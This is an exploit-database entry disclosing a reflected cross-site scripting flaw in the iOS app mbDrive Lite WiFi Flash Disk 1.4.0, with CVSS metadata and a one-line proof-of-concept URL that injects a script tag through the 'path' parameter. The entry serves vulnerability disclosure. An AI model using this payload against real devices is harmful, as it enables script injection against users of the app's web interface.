Advertisement






mbDrive Lite WiFi Flash Disk 1.4.0 Cross Site Scripting

CVE Category Price Severity
N/A CWE-79 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2022-09-11
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090024

Below is a copy:

mbDrive Lite WiFi Flash Disk 1.4.0 Cross Site Scripting
# Exploit Title: mbDrive Lite - WiFi flash disk 1.4.0 Reflected XSS
# Date: Sep 8, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage:
https://apps.apple.com/us/developer/haw-yuan-yang/id291212805
# Software Link:
https://apps.apple.com/us/app/mbdrive-lite-wifi-flash-disk/id343254033
# Version: 1.4.0
# Tested on: iPhone ios 15.6


poc:

http://192.168.1.187:8080/list?path=%3Cscript%3Ealert(%271%27);%3C/script%3E

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.